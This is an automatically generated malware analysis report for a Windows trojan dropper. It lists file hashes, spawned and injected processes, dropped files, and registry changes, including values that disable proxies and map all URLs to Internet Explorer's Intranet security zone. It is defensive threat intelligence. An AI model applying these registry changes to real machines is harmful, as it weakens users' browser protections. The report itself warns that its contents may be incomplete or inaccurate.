Trojan.NSIS.StartPage_f43a604241

by malwarelabrobot on December 25th, 2015 in Malware Descriptions.

Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: f43a604241f2bb41d3ee1064890c23e1
SHA1: 056ba21a40e6beade3dc58fcd235e8a586f3adf6
SHA256: 544feaa02ef78f2468cea21c55a2573ca37249aad27b2fcc612fbd13b886491c
SSDeep: 3072:jQIURTXJeMMeGha2ppB6K58lAR0HhOv8W0Fb83:js9MtR8uyQv0B83
Size: 103077 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nsh1D.tmp:260
nsh1D.tmp:1264
Bind.exe:776
amisid.exe:828
ppt.exe:1788
%original file name%.exe:1332
nsr1A.tmp:2012
nst16.tmp:264
nsw7.tmp:1224
nsn24.tmp:1984
setup3.exe:408
nsoB.tmp:284
setup3.tmp:1040

The Trojan injects its code into the following process(es):

avg18.exe:1888
adv_128.exe:1276

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
RasPbFile
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ShimCacheMutex

File activity

The process nsh1D.tmp:260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\inetc.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\amisid.exe (909 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\amisid.exe (0 bytes)

The process nsh1D.tmp:1264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\checks.txt (544 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\amisid.exe (0 bytes)

The process avg18.exe:1888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe (1188757 bytes)

The process %original file name%.exe:1332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsn8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pptxd[1].exe (47264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cmmdWriter[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (36464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (150707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv29.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\prepreinstaller_win[1].exe (36464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn24.tmp (47264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn23.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1A.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\L5lD0nHnr[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2.tmp (10646 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\wpesEcv[1].exe (150707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)

The process nsr1A.tmp:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1D.tmp (8472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_OperaRUnew[1].exe (8472 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nss1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1E.tmp\inetc.dll (0 bytes)

The process nst16.tmp:264 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\avg18.exe (40388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\SilentInstaller_dotnet4[1].exe (152993 bytes)

The process nsw7.tmp:1224 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi9.tmp (0 bytes)

The process nsn24.tmp:1984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\setup3.exe (2420 bytes)

The process setup3.exe:408 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp\setup3.tmp (7386 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-IQVJP.tmp\setup3.tmp (0 bytes)

The process nsoB.tmp:284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (3638 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nskD.tmp (0 bytes)

The process setup3.tmp:1040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\baidu\is-GBLUE.tmp (36 bytes)
%Program Files%\baidu\unins000.dat (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\baidu\is-KO5N5.tmp (34453 bytes)
%Program Files%\baidu\is-I042G.tmp (601 bytes)
%Program Files%\baidu\baidu.ini (65 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-1NTQ5.tmp\_isetup (0 bytes)

Registry activity

The process nsh1D.tmp:260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst20.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst20.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst22.tmp\registry.dll,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 19 20 A1 CD 54 BE 8E 33 25 ED 48 50 3D 3B 0C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\InternetTurbo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsh1D.tmp:1264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 94 B2 1A EC 32 4B A1 02 33 A6 26 45 DB D1 E1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst20.tmp\registry.dll,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"

The process Bind.exe:776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D E0 96 39 2D 9D A7 C0 08 F8 D5 27 20 2D F5 48"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process avg18.exe:1888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 A6 4A 1B FE 57 6D F7 DC D9 34 83 07 D6 1B 13"

The process amisid.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"

[HKCU\Software\InternetTurbo]
"UID" = "C8318CA6891F5119A9FD96EC19E98D71"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 DE D2 21 3A 2B 57 7B 10 08 5A 27 F1 22 3C 52"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"

The process ppt.exe:1788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 14 A3 8B BD 41 65 E5 B7 17 46 17 D1 E3 F6 4E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

